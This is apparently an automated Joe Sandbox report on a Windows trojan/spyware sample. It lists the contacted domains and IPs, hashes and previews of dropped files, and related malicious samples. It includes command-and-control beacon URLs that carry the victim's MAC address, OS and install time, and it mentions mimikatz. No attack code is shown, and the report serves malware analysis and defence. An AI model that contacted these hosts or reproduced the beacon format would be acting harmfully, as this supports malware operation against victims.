http://jsonip.com/0%Avira URL Cloudsafe
http://pingcastle.com0%Avira URL Cloudsafe
http://blog.gentilkiwi.com/mimikatz0%Avira URL Cloudsafe
http://info.abbny.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=00%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://i.haqo.net/s.png?u=0%Avira URL Cloudsafe
https://oneget.orgX0%Avira URL Cloudsafe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand0%Avira URL Cloudsafe
http://pywin32.sourceforge.net00%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jsonip.com
45.79.77.20
truefalseunknown
42.pl
79.98.145.42
truefalseunknown
info.ackng.com
127.0.0.1
truetrueunknown
beahh.com
72.52.178.23
truetrueunknown
info.abbny.com
173.231.189.15
truetrue
    		unknown
    info.beahh.com
    		unknown
    		unknownfalse
      		unknown
      ip.42.pl
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://ip.42.pl/rawfalse
        • Avira URL Cloud: safe
        		unknown
        http://info.beahh.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0true
        • Avira URL Cloud: safe
        		unknown
        http://jsonip.com/false
        • Avira URL Cloud: safe
        		unknown
        http://info.abbny.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0true
        • Avira URL Cloud: safe
        		unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://mysmartlogon.comPowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drfalse
          		high
          http://python.org/dev/peps/pep-0263/python27.dll.0.drfalse
            		high
            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://jsonip.comUlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://w.beahh.com/page.html?p%COMPUTERNAME%UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpfalse
                    		high
                    http://www.openssl.org/support/faq.html_ssl.pyd.0.drfalse
                      		high
                      http://pingcastle.comPowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://blog.gentilkiwi.com/mimikatzPowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.openssl.org/support/faq.html...................._hashlib.pyd.0.drfalse
                        		high
                        http://www.unicode.org/reports/tr44/tr44-4.html).unicodedata.pyd.0.drfalse
                          		high
                          https://contoso.com/powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpfalse
                            		high
                            http://i.haqo.net/s.png?u=UlJpFEz1Cj.exe, 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://oneget.orgXpowershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pywin32.sourceforge.net0pywintypes27.dll.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://oneget.orgpowershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            79.98.145.42
                            		42.plPoland
                            		39310NITRONETPLfalse
                            173.231.189.15
                            		info.abbny.comUnited States
                            		29791VOXEL-DOT-NETUStrue
                            72.52.178.23
                            		beahh.comUnited States
                            		32244LIQUIDWEBUStrue

                            Private

                            IP
                            192.168.0.2
                            192.168.0.1
                            192.168.0.4
                            192.168.0.3
                            192.168.0.14
                            192.168.0.9
                            192.168.0.15
                            192.168.0.16
                            192.168.0.17
                            192.168.0.6
                            192.168.0.18
                            192.168.0.5
                            192.168.0.19
                            192.168.0.8
                            192.168.0.7
                            192.168.0.20
                            192.168.0.21
                            192.168.0.22
                            192.168.0.23
                            192.168.0.24
                            192.168.3.93
                            192.168.0.10
                            192.168.0.11
                            192.168.0.12
                            192.168.0.13
                            192.168.0.170
                            192.168.0.172
                            192.168.0.171
                            192.168.0.58
                            192.168.0.59
                            192.168.0.61
                            192.168.0.62
                            192.168.0.63
                            192.168.0.64
                            192.168.0.65
                            192.168.0.66
                            192.168.0.67
                            192.168.0.68
                            192.168.0.178
                            192.168.0.177
                            192.168.0.179
                            192.168.0.174
                            192.168.0.173
                            192.168.0.176
                            192.168.0.60
                            192.168.0.175
                            192.168.0.161
                            192.168.0.160
                            192.168.0.47
                            192.168.0.48
                            192.168.0.49
                            192.168.0.50
                            192.168.0.51
                            192.168.0.52
                            192.168.0.53
                            192.168.0.54
                            192.168.0.55
                            192.168.0.56
                            192.168.0.57
                            192.168.0.167
                            192.168.0.166
                            192.168.0.169
                            192.168.0.168
                            192.168.0.163
                            192.168.0.162
                            127.0.0.1
                            192.168.0.165
                            192.168.0.164
                            192.168.0.192
                            192.168.0.191
                            192.168.0.194
                            192.168.0.193
                            192.168.0.190
                            192.168.0.36
                            192.168.0.37
                            192.168.0.38
                            192.168.0.39
                            192.168.0.40
                            192.168.0.41
                            192.168.0.42
                            192.168.0.43
                            192.168.0.44
                            192.168.0.45
                            192.168.0.46
                            192.168.0.199
                            192.168.0.196
                            192.168.0.195
                            192.168.0.198
                            192.168.0.197
                            192.168.0.181
                            192.168.0.180
                            192.168.0.183
                            192.168.0.182
                            192.168.0.25
                            192.168.0.26
                            192.168.0.27
                            192.168.0.28

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:381876
                            Start date:05.04.2021
                            Start time:11:22:13
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 36s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:UlJpFEz1Cj (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:39
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@30/39@21/100
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, dwm.exe, wermgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.193.48, 52.255.188.83, 104.43.139.144, 20.50.102.62, 184.30.20.56, 205.185.216.10, 205.185.216.42, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.190.160.4, 20.190.160.67, 20.190.160.75, 20.190.160.129, 20.190.160.132, 20.190.160.8, 20.190.160.134, 20.190.160.2, 104.42.151.234, 20.54.26.129, 20.82.210.154
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            TimeTypeDescription
                            11:23:03API Interceptor1x Sleep call for process: WMIC.exe modified
                            11:23:13API Interceptor86x Sleep call for process: powershell.exe modified
                            11:24:50API Interceptor5x Sleep call for process: UlJpFEz1Cj.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            72.52.178.23E2qMfhH57G.exeGet hashmaliciousBrowse
                            • www.trackyourvote.com/4qdc/?OhNhA=2AnbmslJtTC0mJvOM3YsDuM40JkIxhFjJH4tZT4junZNCqeMBqARBqQH0BcYEn6RxflB&Yn=fbdxBxrpK46dFH
                            32ciKQsy2X.exeGet hashmaliciousBrowse
                            • www.trackyourvote.com/4qdc/?AR-XJ2=2AnbmslJtTC0mJvOM3YsDuM40JkIxhFjJH4tZT4junZNCqeMBqARBqQH0C8iU2apr4EG&et-=XPJxZ2SpixNTl6pp
                            xPUqa4qbDL.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            xPUqa4qbDL.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            81msxxUisn.exeGet hashmaliciousBrowse
                            • www.nogrudge.com/ndm/?ndkdxd=UXX0bLfxYLyH&mHLDZX=H2A+iUcBXA4pvzlpLnHoTtAhYe/AosYsS6mssCYUdSkJoc9KzWoLI56ChKKWBKP76/3sWxYIhQ==
                            Q38V8rfI5H.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            Q38V8rfI5H.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            7IEK8G8P67.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            7IEK8G8P67.jsGet hashmaliciousBrowse
                            • 101legit.com/0.html
                            PI 11172020.xlsxGet hashmaliciousBrowse
                            • www.paragonic.com/egem/?Ob20Lf_=+SOZmDNuyMcuxJO1TLnPFsdIsmdtl1qFj/QFY12FkiWknvVrPNzDCdooHZfrGkV6uT0+EQ==&BB6=L48xY
                            SKMBT 25032020 Ref- 0000019.exeGet hashmaliciousBrowse
                            • www.aalldxea.com/pg/
                            4535B9F39E debt payment invoice #U007epdf.jsGet hashmaliciousBrowse
                            • canonsupervideo4k.ws/3yiqvg7v
                            4535B9F39E debt payment invoice #U007epdf.jsGet hashmaliciousBrowse
                            • canonsupervideo4k.ws/3yiqvg7v
                            79.98.145.42HVgt9BCw5n.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            SCJOSdfBws.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            JwSzaivpgG.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            WuSttkXyhP.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            ZATpIQL.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            nPwbB.exeGet hashmaliciousBrowse
                            • ip.42.pl/raw
                            173.231.189.15HVgt9BCw5n.exeGet hashmaliciousBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              jsonip.comHVgt9BCw5n.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              Deposit_50%PAYMENT TERM -PO09-excel.htmGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://farmetal.org/ofc3Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://clarifyescape.com/office/ofc/?signin=Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://thefieldpro.com/securelinkGet hashmaliciousBrowse
                              • 45.79.77.20
                              SCJOSdfBws.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              JwSzaivpgG.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              WuSttkXyhP.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              xX1VBl56Zg.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              u60A9siB9m.exeGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://wlsinterests-my.sharepoint.com/:u:/g/personal/egarza_wlshotels_com/EbIh0IlzFF1CmTAMJAhEHp0B74FV0UNvzBJpu_LKCy4rUg?e=6UjkIFGet hashmaliciousBrowse
                              • 45.79.77.20
                              http://www.authorea.com/496817/s_HUCBQs4gOQpqvMdvqmFQGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://icsheadstart-my.sharepoint.com/:b:/g/personal/agreer_ics-hs_org/Efrk8FYTb6pNqHO8jgX4qqcB1ibAW9ZmUWYUGIEnXM4YxA?e=4%3a8jNJwB&at=9Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://share.nuclino.com/p/Ashwood-Law-ShareFile-dbygAiq5tcoYg4AQkWEFueGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://sponewear.com/plugin-france/v12/index.phpGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://bit.ly/2FB9WP9Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://e-sportnyt.dk/folder/refresheedofccieesforthenewtwentytwentyscamp/ofc1/index.phpGet hashmaliciousBrowse
                              • 45.79.77.20
                              https://palmettoironllccom-my.sharepoint.com:443/:b:/g/personal/mandy_palmettoironllc_com/EXqv1co8ojtOkblXk3pZQOMBSROp8YnwDIUb8jaJFNcTTA?e=4%3aC8pdUw&at=9Get hashmaliciousBrowse
                              • 45.79.77.20
                              https://freeday.opens2019.rs/public/back/refresheedofccieesforthenewtwentytwentyscamp/ofc1/index.phpGet hashmaliciousBrowse
                              • 45.79.77.20

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              LIQUIDWEBUSHVgt9BCw5n.exeGet hashmaliciousBrowse
                              • 72.52.178.23
                              Purchase_Order 3109.xlsGet hashmaliciousBrowse
                              • 67.227.236.238
                              RMwfvA9kZy.exeGet hashmaliciousBrowse
                              • 67.225.129.56
                              yx8DBT3r5r.exeGet hashmaliciousBrowse
                              • 67.227.226.240
                              qzinl7qkwD.exeGet hashmaliciousBrowse
                              • 50.28.59.161
                              z2xQEFs54b.exeGet hashmaliciousBrowse
                              • 72.52.178.23
                              qzinl7qkwD.exeGet hashmaliciousBrowse
                              • 50.28.59.161
                              E2qMfhH57G.exeGet hashmaliciousBrowse
                              • 72.52.178.23
                              32ciKQsy2X.exeGet hashmaliciousBrowse
                              • 72.52.178.23
                              SpaceX Starbase Invite.xlsmGet hashmaliciousBrowse
                              • 67.227.251.48
                              SpaceX Starbase Invite.xlsmGet hashmaliciousBrowse
                              • 67.227.251.48
                              SpaceX Starbase Invite.xlsmGet hashmaliciousBrowse
                              • 67.227.251.48
                              xPUqa4qbDL.jsGet hashmaliciousBrowse
                              • 72.52.178.23
                              xPUqa4qbDL.jsGet hashmaliciousBrowse
                              • 72.52.178.23
                              SecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsmGet hashmaliciousBrowse
                              • 67.227.251.48
                              file.docGet hashmaliciousBrowse
                              • 67.227.152.97
                              N6Ej6HEuQt.exeGet hashmaliciousBrowse
                              • 67.225.164.116
                              Payslip 3-3-pdf.exeGet hashmaliciousBrowse
                              • 69.16.200.142
                              Statement_of_Account_as_of_mar_01_2021.xlsmGet hashmaliciousBrowse
                              • 67.227.237.109
                              Complaint_Letter_1195372013-02192021.xlsGet hashmaliciousBrowse
                              • 72.52.229.105
                              VOXEL-DOT-NETUSHVgt9BCw5n.exeGet hashmaliciousBrowse
                              • 173.231.189.15
                              Red Gospel Mission Due Invoices.htmGet hashmaliciousBrowse
                              • 216.52.2.30
                              prompt.exeGet hashmaliciousBrowse
                              • 173.231.184.124
                              taskmgr.exeGet hashmaliciousBrowse
                              • 162.217.99.134
                              z2xQEFs54b.exeGet hashmaliciousBrowse
                              • 162.217.99.134
                              14wfa5dfs.exeGet hashmaliciousBrowse
                              • 64.95.103.190
                              2CmsahykgZ.exeGet hashmaliciousBrowse
                              • 107.6.74.73
                              aTbfFdzWQw.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                              • 63.251.227.200
                              GoE9u8SlS8.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              #U5ba2#U6237#U7aef.exeGet hashmaliciousBrowse
                              • 162.217.99.134
                              ijjKuVEER4.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              VM7AwxwMjV.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              14wfa5dfs.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              request_form_1612805504.xlsGet hashmaliciousBrowse
                              • 63.251.235.71
                              14wfa5dfs.exeGet hashmaliciousBrowse
                              • 63.251.235.71
                              nzGUqSK11D.exeGet hashmaliciousBrowse
                              • 72.26.218.72
                              http://search.hwatchtvnow.coGet hashmaliciousBrowse
                              • 72.251.249.9
                              http://search.hwatchtvnow.coGet hashmaliciousBrowse
                              • 216.52.2.39
                              NITRONETPLHVgt9BCw5n.exeGet hashmaliciousBrowse
                              • 79.98.145.42
                              ZATpIQL.exeGet hashmaliciousBrowse
                              • 79.98.145.42
                              SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exeGet hashmaliciousBrowse
                              • 79.98.145.42

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pydHVgt9BCw5n.exeGet hashmaliciousBrowse
                                SCJOSdfBws.exeGet hashmaliciousBrowse
                                  JwSzaivpgG.exeGet hashmaliciousBrowse
                                    WuSttkXyhP.exeGet hashmaliciousBrowse
                                      xX1VBl56Zg.exeGet hashmaliciousBrowse
                                        u60A9siB9m.exeGet hashmaliciousBrowse
                                          windows_temp_svchost.exe.exeGet hashmaliciousBrowse
                                            pzNu5nkT1f.exeGet hashmaliciousBrowse
                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pydHVgt9BCw5n.exeGet hashmaliciousBrowse
                                                SCJOSdfBws.exeGet hashmaliciousBrowse
                                                  JwSzaivpgG.exeGet hashmaliciousBrowse
                                                    WuSttkXyhP.exeGet hashmaliciousBrowse
                                                      xX1VBl56Zg.exeGet hashmaliciousBrowse
                                                        u60A9siB9m.exeGet hashmaliciousBrowse
                                                          windows_temp_svchost.exe.exeGet hashmaliciousBrowse
                                                            pzNu5nkT1f.exeGet hashmaliciousBrowse

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):9432
                                                              Entropy (8bit):4.918232018284106
                                                              Encrypted:false
                                                              SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                                                              MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                                                              SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                                                              SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                                                              SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                                                              Malicious:false
                                                              Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.9260988789684415
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulb/lj:NllUb/l
                                                              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                              Malicious:false
                                                              Preview: @...e................................................@..........
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):29184
                                                              Entropy (8bit):7.038537453562088
                                                              Encrypted:false
                                                              SSDEEP:384:SJKckxaWHQuFS1bIYcBjZjKjzA37usOo8Vd6IHiPKDkAKB5F0riKXORPfVlLraf0:SJDkxaywpjcJhuAahoICS4AI3SAN9m
                                                              MD5:9FD78D7D6AB69AF5A14E0F29AFFD7EF4
                                                              SHA1:34D9251F746F10F656542772C067A56FE686247C
                                                              SHA-256:87C920ED2C1AFCF295729563B4DEF671DC9E36EF8B3E183D4836571300180E74
                                                              SHA-512:73768A900774CC6C96AC2A08589B42D00A2E8BAB12DC7D7FA2F6F1B27EF0399668046D3BF94997F8A3A2AF8653897F4861BCACFC03E039EBA3A7847CD4E0C005
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: HVgt9BCw5n.exe, Detection: malicious, Browse
                                                              • Filename: SCJOSdfBws.exe, Detection: malicious, Browse
                                                              • Filename: JwSzaivpgG.exe, Detection: malicious, Browse
                                                              • Filename: WuSttkXyhP.exe, Detection: malicious, Browse
                                                              • Filename: xX1VBl56Zg.exe, Detection: malicious, Browse
                                                              • Filename: u60A9siB9m.exe, Detection: malicious, Browse
                                                              • Filename: windows_temp_svchost.exe.exe, Detection: malicious, Browse
                                                              • Filename: pzNu5nkT1f.exe, Detection: malicious, Browse
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5...=...5...>...5...;...<.......5...3...5...=...5...=...Rich<...........................PE..L...S..[...........!.........D.......8.......@......................................................................0p..D....j..P...............................8...................................Pi..@............@...............................text...*-.......................... ..`.rdata..t0...@...2...2..............@..@.data...<............d..............@....reloc...............l..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):8704
                                                              Entropy (8bit):5.300009832250536
                                                              Encrypted:false
                                                              SSDEEP:192:zC2WXyRvqhSZJqPfKqm7Kh/3XvVlD6LaO+6:GBXeqhSZ4P5WKh/fVlaL+
                                                              MD5:8D85DBF6C981BFF4E8A1BEA86A0AC5E9
                                                              SHA1:46C4CBC697A63547F2534C0E72E3C85FB98EEF7B
                                                              SHA-256:356623219B8C098435D511C0055C061018641D8B700EB089FC6FF87D233260E1
                                                              SHA-512:6D199A2F449CB8FBCEAE63AA348722C0208B0B23C2C6E1BB17FFD8EB765CB6CA27B8C16FED276E6B7688A685D2230DA62A8DBAFE4F61A2BF96DECA2A4C46CE72
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: HVgt9BCw5n.exe, Detection: malicious, Browse
                                                              • Filename: SCJOSdfBws.exe, Detection: malicious, Browse
                                                              • Filename: JwSzaivpgG.exe, Detection: malicious, Browse
                                                              • Filename: WuSttkXyhP.exe, Detection: malicious, Browse
                                                              • Filename: xX1VBl56Zg.exe, Detection: malicious, Browse
                                                              • Filename: u60A9siB9m.exe, Detection: malicious, Browse
                                                              • Filename: windows_temp_svchost.exe.exe, Detection: malicious, Browse
                                                              • Filename: pzNu5nkT1f.exe, Detection: malicious, Browse
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8...|i..|i..|i..u...}i..u...~i..u...{i..|i..Ji..u...si..u...}i..u...}i..Rich|i..........................PE..L...T..[...........!................E........ ...............................P......................................0'..F....!..P............................@.......................................!..@............ ...............................text...Z........................... ..`.rdata..v.... ......................@..@.data...d....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd
                                                              Process:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):54272
                                                              Entropy (8bit):4.263764591782059
                                                              Encrypted:false
                                                              SSDEEP:384:nFwYLx5h7kir1Zsl72lpS4Jr4i5Z10OJi/fVlDDK3Wy:nFvLx5hYixZ62lvfMuMNd
                                                              MD5:4B7B86B41280DFD1E1D29A7F626393EF
                                                              SHA1:4917F788B4CD11996E1332D5F376CA0DF41370B4
                                                              SHA-256:8B0F41FD5A3D78E7C4990B1DF3414C4FA221624444F318BB0A29F92F02B1A15E
                                                              SHA-512:16CABC4BD25AD98D7B277F548A6FEED1FB05FACABE3796F19FF3A24FD1E2C04C958B4F8CDC7EB1BF3D7CEC13E5D02E170A9838EC4D617FE20F4225AC50973B7E
                                                              Malicious:false
                                                              Antivirus:
